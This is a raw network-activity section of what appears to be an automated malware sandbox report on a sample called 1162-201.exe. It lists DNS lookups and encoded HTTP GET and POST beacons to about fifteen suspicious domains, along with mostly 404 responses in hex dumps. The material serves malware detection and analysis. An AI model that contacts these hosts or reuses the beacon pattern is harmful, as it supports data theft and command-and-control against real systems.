                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\1162-201.exeCode function: 0_2_00C9CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00C9CE44
                Source: global trafficHTTP traffic detected: GET /ca6n/?-0-L9xY=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.kx22368.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /d89m/?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.laduta.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pgw3/?Mn=PdO8wZnxGnZX&-0-L9xY=giVj5h0GrIkb2nAntMgQgIHhz9vsvZP6QDamwOszT0WhTX9+0mDl7NHSkZ+hOyPxCf2Vu3CaIskW8RrY03yQo2eiaMWSi+vSOZimmmNTE2YBudIqT+28rai5l9Ujnr5BEbYzzwU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /hf4a/?-0-L9xY=1xLyW3NuagjZMWLakpM9q9Dlq5M4Mwlw3Xlkp07XGkfoNpNQ7ONbaOfooFbWkXkUauDqyi9rr3xWBLUVS1AbncpoQpr6kYxUu+wU3Tx1ZPQnZRQ2cE7e7gBiti52HSebvZ5SsDs=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.ripbgs.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t0rn/?Mn=PdO8wZnxGnZX&-0-L9xY=Yd+jCUH61c4a7Q1+Dkx6pQX3S61LKXAtFbIeY4NO2NPuq2cKreHL8mdEdFCyOqVBfEq7A2gNsBXq87HwyvEMJSNDnPhs3w+B9xX6N7MrbCFYPNclLBgQ9fjNZkREdMjUbQytONk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.explorevision.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wn9b/?-0-L9xY=vboslbB2+fPQbuQgZEku0U8Mit34kv6hkjEO/9jYS6JieTwBpMMlA1+GJuZnlONOskCea7euAeJ8nc5JKxSpmkXrUEu+S/eo/p+L/n9ML9zYgduzowjOe25j+nYWtjJhKH1IZis=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.babyzhibo.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /utww/?-0-L9xY=tlTwcU9ZWjUkkDOfL8m8hKdUQz2PcyBI6lKxmlk4uDhIu7zh7TbGiDYhoS5CKbA93kURRma0w2BXBhIfz9bvypQbFpT5jG8x4isXk855maVsJaNYXMtMyHgYaLu1BwVeMhPbSn8=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.mzkd6gp5.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s1ai/?Mn=PdO8wZnxGnZX&-0-L9xY=OeuCC4AAQS2w6DeZmykOBUICy+Ibjx9D3RgTSDmLGyfpyTmRf/Og24qPiqLVP2x5Sr9ji300Ieqror0vpzcssLhcoQBQDTaflTjWEmv0cWcvwj5EA3qCrdMAiiyroqZ2qSN6N28= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.infovea.techConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.itcomp.storeConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /oqj2/?Mn=PdO8wZnxGnZX&-0-L9xY=tgXYdkLIQp5X1DQK2Lc0zTS8fsB8z/iBngGKB1idJuR6ndicPlBASrfeljqr7NFo/3ruzmmh7usSa3Ts+9UehuGvsJDxVXRAIIPhWP6NCAav+HV8QwX1dk0t+FHMIvusdCtCdZ0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.100millionjobs.africaConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ufm5/?Mn=PdO8wZnxGnZX&-0-L9xY=oc2Ugo7X/DVLb3HoIsa141WPD8DQYVLt5ibtMrinrDozD5x17UU4sfIyzVFZWMP4gpVNgjcaO4w3lUPdIZ87CNE5Lom3+E6tX7ctr5EfQpvE80XMoDlosFwsnFO5slPeaFGzRec= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.overlayoasis.questConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.kx22368.shop
                Source: global trafficDNS traffic detected: DNS query: www.laduta.xyz
                Source: global trafficDNS traffic detected: DNS query: www.einpisalpace.shop
                Source: global trafficDNS traffic detected: DNS query: www.ripbgs.info
                Source: global trafficDNS traffic detected: DNS query: www.0303588a47.buzz
                Source: global trafficDNS traffic detected: DNS query: www.tizzles.tech
                Source: global trafficDNS traffic detected: DNS query: www.explorevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.babyzhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.mzkd6gp5.top
                Source: global trafficDNS traffic detected: DNS query: www.potorooqr.lol
                Source: global trafficDNS traffic detected: DNS query: www.infovea.tech
                Source: global trafficDNS traffic detected: DNS query: www.itcomp.store
                Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                Source: global trafficDNS traffic detected: DNS query: www.glyttera.shop
                Source: global trafficDNS traffic detected: DNS query: www.overlayoasis.quest
                Source: unknownHTTP traffic detected: POST /d89m/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.laduta.xyzOrigin: http://www.laduta.xyzReferer: http://www.laduta.xyz/d89m/Cache-Control: no-cacheContent-Length: 212Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30Data Raw: 2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b 38 36 4b 30 76 70 49 70 50 67 65 31 6a 73 39 46 42 6f 6c 79 32 6f 51 46 30 6a 75 59 4c 62 6a 4f 72 79 54 36 77 73 39 33 43 59 51 76 37 55 76 59 50 51 38 56 4a 57 6c 63 41 49 49 6f 74 6c 36 4d 59 57 4c 36 4e 4e 6e 52 36 42 37 4d 2b 6e 56 55 70 30 39 55 6c 70 48 4d 62 58 45 73 71 64 42 31 5a 52 4e 33 62 6b 52 33 67 7a 6e 34 77 59 61 78 58 4b 38 34 75 66 68 5a 5a 37 50 4b 70 6a 4f 62 39 56 49 4a 75 6b 6d 66 61 44 35 6c 75 31 49 32 6b 6e 6f 34 Data Ascii: -0-L9xY=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:11:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L70RIiBmOYfKGjaYeipFVbIyeXCyhl779EQGsO0G9bSmUGHUZDh29N%2B%2BHvBInc%2FjkLxZohVOuZDcG4lOOjnZuit0oaiVPh9hWeBtF4cxOfsYeQSY6vrgD1yV7skN%2FRGEWDD4%2B9miRAo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb323efcdb4321-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=790&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:11:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJ7hrss%2Byexp%2F9EiCU0U0gYQ9GK24OY0%2BT12nZrkiH3Pi8ciGA%2BBYiE7t0lucV1JPKFAwL8qjyTAnDs37DA1TsvfDhcuZ%2ByWTFyKuo7cK7c65OMGzgW7dVz%2BF%2FXk9pwbACWHZzX5w8k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb324eeb0242c9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1662&rtt_var=831&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=814&delivery_rate=0&cwnd=125&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce Data Ascii: 2daTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQ
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:11:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65oyZ4DP%2BC0JwGm3OPngz5mLyZxKGMdEViDQA%2FFgTe2qEW7ZtlLBaYPqZct0PZYea3WmCjQxMf7UVgKPeqFhVGMcxcCUKdGZVRH1m9uazUNIqQoITAkKkfIkHX%2BVv5E%2BSE67eLwsj8E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb325ecd3c8c30-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=1009&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1827&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 4d 6f db 38 10 bd e7 57 cc 2a d8 45 17 a8 4c cb 4e 9b 58 92 05 64 ed 04 5b a0 db 06 ad 8b dd 1c 19 69 2c 32 95 48 2e 39 96 ad 06 fd ef 05 25 c5 76 d0 0f f4 50 ea 42 cd bc 79 6f 86 9c 61 fa db f2 ed 62 75 7b 73 05 82 ea 0a 6e 3e fc f5 fa d5 02 82 90 b1 7f a7 0b c6 96 ab 25 fc f7 f7 ea 9f d7 10 8d c6 f0 9e ac cc 89 b1 ab 37 01 04 82 c8 c4 8c 6d b7 db d1 76 3a d2 b6 64 ab 77 6c e7 59 22 1f 36 6c 43 d7 c5 8c 0a 2a 82 ec 24 ed 44 76 75 a5 dc fc 1b 04 d1 6c 36 eb e3 02 0f 8a 2b ae ca 79 80 2a 80 fd 2e 4b 05 f2 22 3b 01 00 48 49 52 85 d9 d9 f8 0c fe a8 0b ee 44 02 6f 34 c1 b5 de a8 22 65 bd b3 07 d6 48 1c bc 5e 88 ff 6f 64 33 0f 16 5a 11 2a 0a 57 ad c1 00 f2 fe 6f 1e 10 ee 88 79 fd 04 72 c1 ad 43 9a 7f 58 5d 87 17 01 3b 26 52 bc c6 79 50 a0 cb ad 34 24 b5 3a 62 78 af ad 6d 9f 83 e1 25 82 d2 04 6b 9f cc 3e dc 51 5b 21 50 6b 70 d0 ca 9d 0b 7a 9f 5f 77 ba 68 e1 61 ad 15 85 4e 7e c2 38 3a 33 bb 04 72 5d 69 1b 9f 9e 77 2b 81 ce bd e6 b5 ac da 98 5b c9 ab 04 3c 55 c8 2b 59 aa 38 47 45 68 93 cf 7b 4e 11 3d 61 bc 18 1f 51 ce 66 97 e7 97 Data Ascii: 2cfTMo8W*ELNXd[i,2H.9%vPByoabu{sn>%7mv:dwlY"6lC*$Dvul6+y*.K";HIRDo4"eH^od3Z*WoyrCX];&RyP4$:bxm%k>Q[!Pkpz_whaN~8:3r]iw+[<U+Y8GEh{N=aQf
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:11:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sun, 05 Jan 2025 21:39:02 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v2dPqzR%2Fzpay%2BDAh0BItakTeQ8UGqi0Riu2ePbol0IB55lUBW%2FkdOdbgs%2FZDJS57O9%2FMlvINr%2FTv6P5sQjRwFBTuJAn33DBVS%2FljzLri96qesvFbh8tY7DP7ZM0cvj3YX%2FJgFH9MXV4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ffb326ece0541cd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=524&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 Data Ascii: 592<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 08:12:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not 